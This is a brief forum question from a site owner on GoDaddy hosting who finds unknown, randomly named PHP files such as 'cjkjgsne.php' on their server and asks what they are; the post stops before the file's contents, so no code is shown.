unknown php files showing up on server [duplicate]

I keep getting these weird files showing up on our server. I think it's indicative of some security issue but I'm not sure why these are showing up or what they do. Any ideas?

This is a web site hosted on GoDaddy. We are getting ready to move to a new host but I doubt it will fix the problem (we are moving for other reasons).

An example filename is "cjkjgsne.php" and the file looks like this:
